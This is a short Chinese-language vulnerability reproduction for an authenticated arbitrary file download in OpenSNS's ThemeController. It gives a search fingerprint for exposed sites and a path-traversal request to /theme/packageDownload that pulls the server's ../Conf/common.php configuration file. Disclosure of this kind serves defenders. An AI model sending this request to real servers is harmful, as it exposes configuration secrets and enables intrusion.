OpenSNS ThemeController.class.php 后台任意文件下载漏洞

漏洞描述

OpenSNS ThemeController.class.php文件中存在文件下载,其中过滤不足导致可以下载服务器任意文件。

漏洞影响

OpenSNS

网络测绘

icon_hash=”1167011145″

漏洞复现

登录页面如下

20231031173940234-05224538-b6e5-4e9f-a15c-0a820dacc9a5 (1)

存在漏洞的文件为 Application/Admin/Model/ThemeController.class.php

20231031175804809-a8a2147c-9d78-480f-aad7-0951f9855ea9 (1)

其中 theme参数为用户可控参数,根据函数流程可以发现存在的文件将会打包为 zip文件提供下载

20231031175915480-3749359c-4fda-4518-afcd-4594418bf479 (1)

构造请求

POST /admin.php?s=/theme/packageDownload

theme=../Conf/common.php

20231031180041279-370670c6-5b06-4fe5-9f82-4d37fcd39e47 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容